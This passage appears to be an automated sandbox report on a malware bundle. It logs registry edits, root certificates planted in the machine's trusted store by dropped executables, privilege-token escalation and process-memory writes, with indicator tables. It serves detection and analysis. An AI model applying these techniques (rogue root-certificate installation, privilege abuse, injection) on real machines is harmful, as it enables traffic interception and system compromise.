Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_enUS_DavidM"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "177"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2586f1bda5a7d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\NumberOfSubdomain = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "254"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cdn-tc.33across.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1073"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "263"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\33across.com\NumberOfSubd = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "40C"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "273"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cdn-tc.33across.com\ = "67"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mj22.xyz\ = "207"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\33across.com\Total = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "407"	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun05ac1b0207d3ff3b8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun05ac1b0207d3ff3b8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	55	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	75	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	134	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4992	powershell.exe
3196	Sun05532f7abc.exe
3196	Sun05532f7abc.exe
4992	powershell.exe
4992	powershell.exe
4992	powershell.exe
4992	powershell.exe
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
4924	WerFault.exe
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
2996	Explorer.EXE
4568	WerFault.exe
4568	WerFault.exe
4568	WerFault.exe
4568	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2996	Explorer.EXE

Suspicious behavior: MapViewOfSection 20 IoCs

pid	Process
3196	Sun05532f7abc.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
5264	jcsrdgu
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1456	jcsrdgu
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
5768	jcsrdgu
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2760	2796104.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeAssignPrimaryTokenPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeLockMemoryPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeIncreaseQuotaPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeMachineAccountPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeTcbPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeSecurityPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeTakeOwnershipPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeLoadDriverPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeSystemProfilePrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeSystemtimePrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeProfSingleProcessPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeIncBasePriorityPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeCreatePagefilePrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeCreatePermanentPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeBackupPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeRestorePrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeShutdownPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeDebugPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeAuditPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeSystemEnvironmentPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeChangeNotifyPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeRemoteShutdownPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeUndockPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeSyncAgentPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeEnableDelegationPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeManageVolumePrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeImpersonatePrivilege	4968	Sun05d60bc3b96248e5.exe
Token: SeCreateGlobalPrivilege	4968	Sun05d60bc3b96248e5.exe
Token: 31	4968	Sun05d60bc3b96248e5.exe
Token: 32	4968	Sun05d60bc3b96248e5.exe
Token: 33	4968	Sun05d60bc3b96248e5.exe
Token: 34	4968	Sun05d60bc3b96248e5.exe
Token: 35	4968	Sun05d60bc3b96248e5.exe
Token: SeDebugPrivilege	5100	Sun059375dac544fc4a.exe
Token: SeDebugPrivilege	3208	Sun050462125c7d35.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	1780	2.exe
Token: SeDebugPrivilege	1508	7764075.exe
Token: SeDebugPrivilege	1436	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeDebugPrivilege	4032	services64.exe
Token: SeRestorePrivilege	4924	WerFault.exe
Token: SeBackupPrivilege	4924	WerFault.exe
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE
Token: SeCreatePagefilePrivilege	2996	Explorer.EXE
Token: SeShutdownPrivilege	2996	Explorer.EXE

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2996	Explorer.EXE
1460	setup_2.tmp
5936	ultramediaburner.tmp
6968	installer.exe
2996	Explorer.EXE
2996	Explorer.EXE

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2996	Explorer.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2996	Explorer.EXE
6416	MicrosoftEdge.exe
1356	MicrosoftEdgeCP.exe
1356	MicrosoftEdgeCP.exe
6696	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4516 wrote to memory of 4548	4516	setup_x86_x64_install.exe	69
PID 4516 wrote to memory of 4548	4516	setup_x86_x64_install.exe	69
PID 4516 wrote to memory of 4548	4516	setup_x86_x64_install.exe	69
PID 4548 wrote to memory of 4612	4548	setup_installer.exe	70
PID 4548 wrote to memory of 4612	4548	setup_installer.exe	70
PID 4548 wrote to memory of 4612	4548	setup_installer.exe	70
PID 4612 wrote to memory of 4788	4612	setup_install.exe	95
PID 4612 wrote to memory of 4788	4612	setup_install.exe	95
PID 4612 wrote to memory of 4788	4612	setup_install.exe	95
PID 4612 wrote to memory of 4800	4612	setup_install.exe	73
PID 4612 wrote to memory of 4800	4612	setup_install.exe	73
PID 4612 wrote to memory of 4800	4612	setup_install.exe	73
PID 4612 wrote to memory of 4816	4612	setup_install.exe	94
PID 4612 wrote to memory of 4816	4612	setup_install.exe	94
PID 4612 wrote to memory of 4816	4612	setup_install.exe	94
PID 4612 wrote to memory of 4836	4612	setup_install.exe	93
PID 4612 wrote to memory of 4836	4612	setup_install.exe	93
PID 4612 wrote to memory of 4836	4612	setup_install.exe	93
PID 4612 wrote to memory of 4856	4612	setup_install.exe	74
PID 4612 wrote to memory of 4856	4612	setup_install.exe	74
PID 4612 wrote to memory of 4856	4612	setup_install.exe	74
PID 4612 wrote to memory of 4876	4612	setup_install.exe	92
PID 4612 wrote to memory of 4876	4612	setup_install.exe	92
PID 4612 wrote to memory of 4876	4612	setup_install.exe	92
PID 4612 wrote to memory of 4900	4612	setup_install.exe	91
